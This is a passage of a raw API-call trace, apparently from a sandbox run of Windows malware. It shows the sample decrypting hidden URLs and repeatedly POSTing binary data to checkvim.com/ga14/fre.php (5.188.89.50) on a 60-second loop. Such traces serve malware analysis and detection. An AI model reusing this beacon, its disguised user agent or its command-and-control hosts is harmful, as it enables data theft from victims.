0x840000 [0307.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0307.672] closesocket (s=0x510) returned 0 [0307.673] GetProcessHeap () returned 0x840000 [0307.673] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0307.673] GetProcessHeap () returned 0x840000 [0307.673] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0307.673] GetProcessHeap () returned 0x840000 [0307.673] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0307.673] GetProcessHeap () returned 0x840000 [0307.673] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0307.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x808) returned 0x510 [0307.674] Sleep (dwMilliseconds=0xea60) [0307.686] GetProcessHeap () returned 0x840000 [0307.686] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0307.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.687] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0307.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.692] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0307.698] GetProcessHeap () returned 0x840000 [0307.698] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0307.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.699] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0307.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.700] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0307.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.701] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.701] GetProcessHeap () returned 0x840000 [0307.701] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0307.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.702] CryptDecrypt (in: hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0307.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.703] CryptDestroyKey (hKey=0x87e430) returned 1 [0307.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.704] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0307.704] GetProcessHeap () returned 0x840000 [0307.704] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0307.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.705] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.706] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.707] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.708] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.708] GetProcessHeap () returned 0x840000 [0307.708] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0307.708] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0307.708] GetProcessHeap () returned 0x840000 [0307.708] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0307.708] GetProcessHeap () returned 0x840000 [0307.708] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0307.708] GetProcessHeap () returned 0x840000 [0307.708] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0307.708] GetProcessHeap () returned 0x840000 [0307.708] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0307.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.709] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0307.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.714] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0307.720] GetProcessHeap () returned 0x840000 [0307.720] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0307.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.721] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0307.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.722] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0307.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.723] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.723] GetProcessHeap () returned 0x840000 [0307.723] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0307.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.724] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0307.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.725] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0307.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.726] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0307.726] GetProcessHeap () returned 0x840000 [0307.726] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0307.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.727] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0307.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.728] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0307.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.728] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0307.729] GetProcessHeap () returned 0x840000 [0307.729] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0307.729] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0307.730] GetProcessHeap () returned 0x840000 [0307.730] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0307.730] socket (af=2, type=1, protocol=6) returned 0x514 [0307.730] connect (s=0x514, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0307.805] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0307.805] GetProcessHeap () returned 0x840000 [0307.805] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0307.805] GetProcessHeap () returned 0x840000 [0307.805] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0307.806] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0307.807] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0307.807] GetProcessHeap () returned 0x840000 [0307.807] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0307.807] GetProcessHeap () returned 0x840000 [0307.807] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0307.807] GetProcessHeap () returned 0x840000 [0307.807] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0307.807] GetProcessHeap () returned 0x840000 [0307.807] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0307.808] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0307.808] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0307.808] GetProcessHeap () returned 0x840000 [0307.808] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0307.808] GetProcessHeap () returned 0x840000 [0307.808] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0307.808] send (s=0x514, buf=0x873a58*, len=237, flags=0) returned 237 [0307.809] send (s=0x514, buf=0x87eb58*, len=159, flags=0) returned 159 [0307.809] GetProcessHeap () returned 0x840000 [0307.809] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0307.809] recv (in: s=0x514, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0308.167] GetProcessHeap () returned 0x840000 [0308.167] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0308.167] GetProcessHeap () returned 0x840000 [0308.167] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0308.167] GetProcessHeap () returned 0x840000 [0308.167] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0308.167] GetProcessHeap () returned 0x840000 [0308.167] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0308.167] closesocket (s=0x514) returned 0 [0308.167] GetProcessHeap () returned 0x840000 [0308.168] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0308.168] GetProcessHeap () returned 0x840000 [0308.168] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0308.168] GetProcessHeap () returned 0x840000 [0308.168] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0308.168] GetProcessHeap () returned 0x840000 [0308.168] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0308.168] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x708) returned 0x514 [0308.170] Sleep (dwMilliseconds=0xea60) [0308.173] GetProcessHeap () returned 0x840000 [0308.173] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcf8 [0308.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.174] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0308.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.180] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0308.187] GetProcessHeap () returned 0x840000 [0308.187] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0308.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.188] CryptImportKey (in: hProv=0x86f798, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0308.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.207] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0308.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.208] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.208] GetProcessHeap () returned 0x840000 [0308.208] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0308.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.209] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcf8, pdwDataLen=0x19f9a4 | out: pbData=0x87fcf8, pdwDataLen=0x19f9a4) returned 1 [0308.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.210] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0308.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.211] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0308.211] GetProcessHeap () returned 0x840000 [0308.211] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0308.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.212] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0308.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.213] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0308.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.214] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0308.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.215] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0308.215] GetProcessHeap () returned 0x840000 [0308.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0308.215] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0308.215] GetProcessHeap () returned 0x840000 [0308.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0308.215] GetProcessHeap () returned 0x840000 [0308.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0308.215] GetProcessHeap () returned 0x840000 [0308.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0308.215] GetProcessHeap () returned 0x840000 [0308.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0308.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.216] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0308.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.221] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0308.226] GetProcessHeap () returned 0x840000 [0308.226] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0308.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.227] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0308.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.228] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0308.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.229] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.229] GetProcessHeap () returned 0x840000 [0308.229] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0308.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.230] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0308.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.231] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0308.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.232] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0308.232] GetProcessHeap () returned 0x840000 [0308.232] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0308.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.233] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0308.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.234] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0308.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.237] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0308.237] GetProcessHeap () returned 0x840000 [0308.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0308.237] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0308.239] GetProcessHeap () returned 0x840000 [0308.239] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0308.239] socket (af=2, type=1, protocol=6) returned 0x518 [0308.239] connect (s=0x518, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0308.310] FreeAddrInfoW (pAddrInfo=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0308.310] GetProcessHeap () returned 0x840000 [0308.310] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f930 [0308.310] GetProcessHeap () returned 0x840000 [0308.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0308.311] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0308.312] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0308.312] GetProcessHeap () returned 0x840000 [0308.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0308.312] GetProcessHeap () returned 0x840000 [0308.312] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0308.312] GetProcessHeap () returned 0x840000 [0308.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0308.312] GetProcessHeap () returned 0x840000 [0308.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0308.313] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0308.314] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0308.314] GetProcessHeap () returned 0x840000 [0308.314] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0308.314] GetProcessHeap () returned 0x840000 [0308.314] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0308.314] send (s=0x518, buf=0x873a58*, len=237, flags=0) returned 237 [0308.314] send (s=0x518, buf=0x87eb58*, len=159, flags=0) returned 159 [0308.314] GetProcessHeap () returned 0x840000 [0308.314] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0308.314] recv (in: s=0x518, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0308.681] GetProcessHeap () returned 0x840000 [0308.681] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0308.681] GetProcessHeap () returned 0x840000 [0308.681] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0308.681] GetProcessHeap () returned 0x840000 [0308.681] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0308.681] GetProcessHeap () returned 0x840000 [0308.681] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f930 | out: hHeap=0x840000) returned 1 [0308.682] closesocket (s=0x518) returned 0 [0308.682] GetProcessHeap () returned 0x840000 [0308.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0308.682] GetProcessHeap () returned 0x840000 [0308.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0308.682] GetProcessHeap () returned 0x840000 [0308.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0308.682] GetProcessHeap () returned 0x840000 [0308.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0308.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xbe4) returned 0x518 [0308.684] Sleep (dwMilliseconds=0xea60) [0308.688] GetProcessHeap () returned 0x840000 [0308.688] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0308.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.690] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0308.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.695] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0308.701] GetProcessHeap () returned 0x840000 [0308.701] RtlAllocateHeap 